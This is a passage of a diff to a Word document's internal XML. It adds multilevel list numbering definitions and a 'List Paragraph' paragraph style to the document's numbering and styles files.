+        <w:ind w:left="4320" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="0409000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%7."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5040" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="04090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%8."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5760" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="0409001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%9."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="6480" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="1">
+    <w:nsid w:val="7DC70EC0"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="2868A4E2"/>
+    <w:lvl w:ilvl="0" w:tplc="04090013">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="upperRoman"/>
+      <w:lvlText w:val="%1."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="360" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="04090019">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%2."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1080" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="0409001B">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%3."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="1800" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="0409000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%4."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2520" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="04090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%5."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3240" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="0409001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%6."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="3960" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="0409000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%7."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="4680" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="04090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%8."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5400" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="0409001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%9."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="6120" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:num w:numId="1">
+    <w:abstractNumId w:val="1"/>
+  </w:num>
+  <w:num w:numId="2">
+    <w:abstractNumId w:val="0"/>
+  </w:num>
+</w:numbering>
 </file>
 
 <file path=word/styles.xml><?xml version="1.0" encoding="utf-8"?>
@@ -1090,6 +1370,17 @@
       <w:szCs w:val="20"/>
     </w:rPr>
   </w:style>
+  <w:style w:type="paragraph" w:styleId="ListParagraph">
+    <w:name w:val="List Paragraph"/>
+    <w:basedOn w:val="Normal"/>
+    <w:uiPriority w:val="34"/>
+    <w:qFormat/>
+    <w:rsid w:val="00323A5F"/>
+    <w:pPr>
+      <w:ind w:left="720"/>
+      <w:contextualSpacing/>
+    </w:pPr>
+  </w:style>
 </w:styles>
 </file>
 
@@ -1292,6 +1583,17 @@
       <w:sz w:val="20"/>
       <w:szCs w:val="20"/>
     </w:rPr>
+  </w:style>
+  <w:style w:type="paragraph" w:styleId="ListParagraph">
+    <w:name w:val="List Paragraph"/>
+    <w:basedOn w:val="Normal"/>
+    <w:uiPriority w:val="34"/>
+    <w:qFormat/>
+    <w:rsid w:val="00323A5F"/>
+    <w:pPr>
+      <w:ind w:left="720"/>
+      <w:contextualSpacing/>
+    </w:pPr>
   </w:style>
 </w:styles>
 </file>

</xml_diff>